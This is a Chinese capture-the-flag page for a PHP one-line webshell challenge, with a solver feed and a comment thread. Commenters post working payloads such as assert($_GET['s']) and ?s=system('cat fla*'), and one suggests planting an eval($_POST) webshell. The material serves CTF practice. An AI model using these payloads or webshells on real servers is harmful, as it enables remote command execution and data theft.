评分(10)
解题动态
aixuexi666 攻破了该题 34分钟前
57 攻破了该题 2小时前
Thompson 攻破了该题 6小时前
song1997 攻破了该题 6小时前
zzz12311 攻破了该题 8小时前
yonge 攻破了该题 11小时前
ruirui102 攻破了该题 12小时前
祥子1 攻破了该题 12小时前
mixiu 攻破了该题 12小时前
tz001 攻破了该题 13小时前
Seb 攻破了该题 14小时前
迷宫 攻破了该题 14小时前
Cooper.juice 攻破了该题 1天前
SXWM 攻破了该题 1天前
Erec 攻破了该题 1天前
Frenemy 攻破了该题 1天前
hsk_zy 攻破了该题 1天前
谢特恒123 攻破了该题 1天前
admincon 攻破了该题 1天前
评论
zxmals 4年前
举报
assert($_GET['s']) 这就是一句话过狗
answer 4年前
举报
就离谱 ?system(dir) .........文件名真不错,爱了爱了
iFound 4年前
举报
重点是描述的话,然后是小马用GET构造请求
god536 4年前
举报
/?s=system('cat fla*')
a2cai 4年前
举报
?我还以为作者要整条狗来看门呢,结果直接$_GET['s']=system('ls')就啥都出来了......
ximing 4年前
举报
根据描述应该应该是一个一句话木马,直接提交命令system(ls),然后在直接访问flag文件
shan 4年前
举报
用system(dir)来过这个题目,是作者本来的思路吗。看评论好像大家用的方法还挺多种的。
yinyue 4年前
举报
不多说了,套娃了解下
eleven 4年前
举报
?s=system("cat *.txt")
naihe567 4年前
举报
没法用POST的webshell,可以自己创建一个命令执行eval($_POST[‘xxx’]) 密码xxx